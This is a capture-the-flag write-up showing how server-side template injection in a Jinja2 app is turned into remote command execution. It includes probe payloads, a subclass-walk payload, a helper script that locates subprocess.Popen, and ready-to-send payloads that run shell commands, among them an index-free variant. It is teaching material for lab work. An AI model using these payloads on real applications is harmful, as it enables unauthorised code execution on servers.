Super Secure Technology Infrastructure
Easy
146
9
Description
Super secure technology infrastructure, A fortress built with digital flair, Encrypted and protected, no intrusion allowed, Our data safe from any dare. Poem by ChatGPT
The challenge title gives it away: the initials of "Super Secure Technology Infrastructure" spell SSTI, so we are looking for a Server Side Template Injection vulnerability.
First, we need to identify the templating engine in use. The usual approach is the decision chart of probe payloads (for example {{7*7}}, ${7*7} and {{7*'7'}}), where each engine's distinctive output narrows down the candidates; the chart itself is not reproduced here.
After playing with the input, we can identify that it is running Jinja2: {{7*7}} renders as 49, and {{7*'7'}} renders as 7777777 (Python string repetition), whereas Twig would render the latter as 49. The hacktricks guide can also be used to identify the templating engine.
Following the Jinja2 section of the SSTI guide, we can turn this into remote code execution and read the flag.
First, we need the index of <class 'subprocess.Popen'> in the list of subclasses of object. This offset is not fixed: it depends on the target's Python version and on which modules the application has imported, so it has to be measured on the target. The payload below walks from the empty string to str, then to object via the MRO, and dumps all of object's subclasses:
{{''.__class__.__mro__[1].__subclasses__()}}

A handy script to find the offset. Paste the full output of the payload above into data; the string below is just the beginning of the real dump, cut off at "...":

data = """[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplemented>..."""
# The dump is a comma-separated list, so the position of an entry after
# splitting on ', ' is exactly its index into __subclasses__()
entries = data.split(', ')
hits = []
for i, entry in enumerate(entries):
    if 'subprocess' in entry:
        print("Found in index:", i)
        hits.append(i)
# Emit one ready-to-send payload per hit; the doubled braces in the f-string
# produce the literal {{ and }} that Jinja2 expects
for i in hits:
    print(f"{{{{ ''.__class__.__mro__[1].__subclasses__()[{i}]('ls',shell=True,stdout=-1).communicate() }}}}")

Once we know where <class 'subprocess.Popen'> sits (index 397 on this particular target), we can call it directly from the template to get RCE. stdout=-1 is the numeric value of subprocess.PIPE, used because the template cannot import subprocess by name, and communicate() returns the captured output so it ends up in the rendered page:
{{''.__class__.__mro__[1].__subclasses__()[397]('cat flag.txt',shell=True,stdout=-1).communicate()}}
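The following is an added example, not code from the original writeup, that reproduces the Popen gadget walk locally in plain Python so you can see why the index has to be measured on the target, and builds both the hard-coded-index payload used above and an index-free Jinja2 variant that matches the class by name. The function names, the SUBCLASS_DUMP string (a constructed, shortened stand-in for the real dump) and the use of echo as the command are assumptions for this example; nothing here touches a remote host.

```python
# Added example (not part of the original writeup): reproduce the Popen gadget
# walk locally to see why the subclass index must be measured on the target.
import subprocess  # loads subprocess.Popen into the interpreter, as a Flask app already has

# Constructed, shortened stand-in for the output of
# {{''.__class__.__mro__[1].__subclasses__()}} on a target.
SUBCLASS_DUMP = (
    "[<class 'type'>, <class 'weakref'>, <class 'int'>, <class 'subprocess.Popen'>]"
)


def object_subclasses():
    """The same walk as the payload: '' -> str -> object -> object.__subclasses__()."""
    return ''.__class__.__mro__[1].__subclasses__()


def find_gadget_indices(name="Popen", module="subprocess"):
    """Indices of the gadget class in this interpreter, matched by name rather than position."""
    return [i for i, cls in enumerate(object_subclasses())
            if cls.__name__ == name and cls.__module__ == module]


def indices_from_dump(dump, needle="subprocess.Popen"):
    """Indices of the gadget in a pasted dump: the writeup's split-on-', ' trick."""
    entries = dump.strip("[]").split(", ")
    return [i for i, entry in enumerate(entries) if needle in entry]


def index_payload(index, cmd):
    """Jinja2 payload that hard-codes the index, as the writeup does with 397."""
    return ("{{''.__class__.__mro__[1].__subclasses__()[%d]"
            "(%r,shell=True,stdout=-1).communicate()}}" % (index, cmd))


# Index-free variant: Jinja2 can loop over the subclass list and test __name__,
# so the same payload works whatever Python build the target runs.
# (Shown as a string only; it is not rendered in this example.)
INDEX_FREE_PAYLOAD = (
    "{% for c in ''.__class__.__mro__[1].__subclasses__() %}"
    "{% if c.__name__ == 'Popen' %}"
    "{{ c('cat flag.txt', shell=True, stdout=-1).communicate()[0] }}"
    "{% endif %}{% endfor %}"
)


def run_gadget(index, cmd):
    """Run cmd through the gadget exactly as the rendered payload would.

    stdout=-1 is the numeric value of subprocess.PIPE; communicate() returns
    (stdout, stderr) and stderr is None because it was not captured.
    """
    out, _err = object_subclasses()[index](cmd, shell=True, stdout=-1).communicate()
    return out


if __name__ == "__main__":
    local = find_gadget_indices()
    print("Popen index in this interpreter:", local)  # almost certainly not 397
    print("Popen index in the pasted dump:", indices_from_dump(SUBCLASS_DUMP))
    print(index_payload(local[0], "cat flag.txt"))
    print(run_gadget(local[0], "echo gadget-works"))
```

Run it under two different Python versions, or with and without extra imports before the walk, and the local index moves: that is the reason the writeup dumps the subclass list from the target first instead of reusing an offset from a guide.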

References
https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection